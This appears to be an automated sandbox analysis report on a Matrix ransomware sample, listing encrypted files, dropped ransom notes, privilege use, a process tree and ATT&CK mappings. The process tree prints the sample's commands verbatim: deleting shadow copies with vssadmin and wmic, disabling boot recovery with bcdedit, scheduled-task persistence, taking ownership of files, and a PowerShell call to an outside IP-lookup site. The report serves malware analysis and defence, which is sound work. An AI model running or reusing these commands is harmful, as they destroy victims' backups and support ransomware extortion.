C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019DemoR_BypassTrial180-ul-oob.xrm-ms fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Trial-pl.xrm-ms fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordR_Retail-ppd.xrm-ms fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\ui-strings.js fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\fr-CA.pak.DATA fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\createpdf.svg fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.ja_5.5.0.165303.jar fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Yellow.xml fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Microsoft Office\root\Office16\SkypeSrv\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Retail-pl.xrm-ms fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-down_32.svg fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\de-de\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1864 schtasks.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4048 vssadmin.exe 3716 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 224 powershell.exe 224 powershell.exe 2052 wkYsZhe164.exe 2052 wkYsZhe164.exe 2052 wkYsZhe164.exe 2052 wkYsZhe164.exe 2052 wkYsZhe164.exe 2052 wkYsZhe164.exe 2052 wkYsZhe164.exe 3920 powershell.exe 3920 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 2052 wkYsZhe164.exe -
Suspicious use of AdjustPrivilegeToken 50 IoCs
description pid Process Token: SeDebugPrivilege 224 powershell.exe Token: SeTakeOwnershipPrivilege 2232 takeown.exe Token: SeDebugPrivilege 2052 wkYsZhe164.exe Token: SeLoadDriverPrivilege 2052 wkYsZhe164.exe Token: SeBackupPrivilege 1696 vssvc.exe Token: SeRestorePrivilege 1696 vssvc.exe Token: SeAuditPrivilege 1696 vssvc.exe Token: SeIncreaseQuotaPrivilege 1988 WMIC.exe Token: SeSecurityPrivilege 1988 WMIC.exe Token: SeTakeOwnershipPrivilege 1988 WMIC.exe Token: SeLoadDriverPrivilege 1988 WMIC.exe Token: SeSystemProfilePrivilege 1988 WMIC.exe Token: SeSystemtimePrivilege 1988 WMIC.exe Token: SeProfSingleProcessPrivilege 1988 WMIC.exe Token: SeIncBasePriorityPrivilege 1988 WMIC.exe Token: SeCreatePagefilePrivilege 1988 WMIC.exe Token: SeBackupPrivilege 1988 WMIC.exe Token: SeRestorePrivilege 1988 WMIC.exe Token: SeShutdownPrivilege 1988 WMIC.exe Token: SeDebugPrivilege 1988 WMIC.exe Token: SeSystemEnvironmentPrivilege 1988 WMIC.exe Token: SeRemoteShutdownPrivilege 1988 WMIC.exe Token: SeUndockPrivilege 1988 WMIC.exe Token: SeManageVolumePrivilege 1988 WMIC.exe Token: 33 1988 WMIC.exe Token: 34 1988 WMIC.exe Token: 35 1988 WMIC.exe Token: 36 1988 WMIC.exe Token: SeIncreaseQuotaPrivilege 1988 WMIC.exe Token: SeSecurityPrivilege 1988 WMIC.exe Token: SeTakeOwnershipPrivilege 1988 WMIC.exe Token: SeLoadDriverPrivilege 1988 WMIC.exe Token: SeSystemProfilePrivilege 1988 WMIC.exe Token: SeSystemtimePrivilege 1988 WMIC.exe Token: SeProfSingleProcessPrivilege 1988 WMIC.exe Token: SeIncBasePriorityPrivilege 1988 WMIC.exe Token: SeCreatePagefilePrivilege 1988 WMIC.exe Token: SeBackupPrivilege 1988 WMIC.exe Token: SeRestorePrivilege 1988 WMIC.exe Token: SeShutdownPrivilege 1988 WMIC.exe Token: SeDebugPrivilege 1988 WMIC.exe Token: SeSystemEnvironmentPrivilege 1988 WMIC.exe Token: SeRemoteShutdownPrivilege 1988 WMIC.exe Token: SeUndockPrivilege 1988 WMIC.exe Token: SeManageVolumePrivilege 1988 WMIC.exe Token: 33 1988 WMIC.exe Token: 34 1988 WMIC.exe Token: 35 1988 WMIC.exe Token: 36 1988 WMIC.exe Token: SeDebugPrivilege 3920 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3532 wrote to memory of 2672 3532 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 59 PID 3532 wrote to memory of 2672 3532 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 59 PID 3532 wrote to memory of 2672 3532 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 59 PID 3532 wrote to memory of 1816 3532 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 61 PID 3532 wrote to memory of 1816 3532 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 61 PID 3532 wrote to memory of 1816 3532 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 61 PID 3532 wrote to memory of 656 3532 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 69 PID 3532 wrote to memory of 656 3532 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 69 PID 3532 wrote to memory of 656 3532 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 69 PID 656 wrote to memory of 224 656 cmd.exe 71 PID 656 wrote to memory of 224 656 cmd.exe 71 PID 656 wrote to memory of 224 656 cmd.exe 71 PID 3532 wrote to memory of 1864 3532 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 72 PID 3532 wrote to memory of 1864 3532 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 72 PID 3532 wrote to memory of 1864 3532 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 72 PID 3532 wrote to memory of 2656 3532 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 74 PID 3532 wrote to memory of 2656 3532 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 74 PID 3532 wrote to memory of 2656 3532 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 74 PID 1864 wrote to memory of 3388 1864 cmd.exe 77 PID 1864 wrote to memory of 3388 1864 cmd.exe 77 PID 1864 wrote to memory of 3388 1864 cmd.exe 77 PID 2656 wrote to memory of 1968 2656 cmd.exe 76 PID 2656 wrote to memory of 1968 2656 cmd.exe 76 PID 2656 wrote to memory of 1968 2656 cmd.exe 76 PID 3532 wrote to memory of 3568 3532 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 78 PID 3532 wrote to memory of 3568 3532 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 78 PID 3532 wrote to memory of 3568 3532 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 78 PID 1864 wrote to memory of 3448 1864 cmd.exe 80 PID 1864 wrote to memory of 3448 1864 cmd.exe 80 PID 1864 wrote to memory of 3448 1864 cmd.exe 80 PID 1864 wrote to memory of 1288 1864 cmd.exe 81 PID 1864 wrote to memory of 1288 1864 cmd.exe 81 PID 1864 wrote to memory of 1288 1864 cmd.exe 81 PID 3568 wrote to memory of 2220 3568 cmd.exe 82 PID 3568 wrote to memory of 2220 3568 cmd.exe 82 PID 3568 wrote to memory of 2220 3568 cmd.exe 82 PID 3568 wrote to memory of 3500 3568 cmd.exe 83 PID 3568 wrote to memory of 3500 3568 cmd.exe 83 PID 3568 wrote to memory of 3500 3568 cmd.exe 83 PID 3568 wrote to memory of 2232 3568 cmd.exe 84 PID 3568 wrote to memory of 2232 3568 cmd.exe 84 PID 3568 wrote to memory of 2232 3568 cmd.exe 84 PID 3568 wrote to memory of 3192 3568 cmd.exe 85 PID 3568 wrote to memory of 3192 3568 cmd.exe 85 PID 3568 wrote to memory of 3192 3568 cmd.exe 85 PID 3192 wrote to memory of 3540 3192 cmd.exe 86 PID 3192 wrote to memory of 3540 3192 cmd.exe 86 PID 3192 wrote to memory of 3540 3192 cmd.exe 86 PID 3540 wrote to memory of 2052 3540 wkYsZhe1.exe 88 PID 3540 wrote to memory of 2052 3540 wkYsZhe1.exe 88 PID 1968 wrote to memory of 3448 1968 wscript.exe 90 PID 1968 wrote to memory of 3448 1968 wscript.exe 90 PID 1968 wrote to memory of 3448 1968 wscript.exe 90 PID 3448 wrote to memory of 1864 3448 cmd.exe 92 PID 3448 wrote to memory of 1864 3448 cmd.exe 92 PID 3448 wrote to memory of 1864 3448 cmd.exe 92 PID 1968 wrote to memory of 2988 1968 wscript.exe 93 PID 1968 wrote to memory of 2988 1968 wscript.exe 93 PID 1968 wrote to memory of 2988 1968 wscript.exe 93 PID 2988 wrote to memory of 984 2988 cmd.exe 95 PID 2988 wrote to memory of 984 2988 cmd.exe 95 PID 2988 wrote to memory of 984 2988 cmd.exe 95 PID 3048 wrote to memory of 4048 3048 cmd.exe 98 PID 3048 wrote to memory of 4048 3048 cmd.exe 98 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2220 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe"C:\Users\Admin\AppData\Local\Temp\fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe"1⤵
- Matrix Ransomware
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe" "C:\Users\Admin\AppData\Local\Temp\NWms5ZnU.exe"2⤵PID:2672
-
-
C:\Users\Admin\AppData\Local\Temp\NWms5ZnU.exe"C:\Users\Admin\AppData\Local\Temp\NWms5ZnU.exe" -n2⤵
- Executes dropped EXE
PID:1816
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\bD2CqHaw.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:224
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\ByXMTJdC.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\ByXMTJdC.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:3388
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:3448
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:1288
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\pj0blc8F.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\pj0blc8F.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\7eOKxzxt.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:3448 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\7eOKxzxt.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:1864
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:984
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EYhrK0ps.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Views/modifies file attributes
PID:2220
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:3500
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wkYsZhe1.exe -accepteula "store.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:3192 -
C:\Users\Admin\AppData\Local\Temp\wkYsZhe1.exewkYsZhe1.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3540 -
C:\Users\Admin\AppData\Local\Temp\wkYsZhe164.exewkYsZhe1.exe -accepteula "store.db" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:2052
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\7eOKxzxt.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:4048
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3920 -
C:\Windows\system32\vssadmin.exe"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3716
-
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:268
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3976
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:3996
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1696
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Hidden Files and Directories
1Modify Registry
2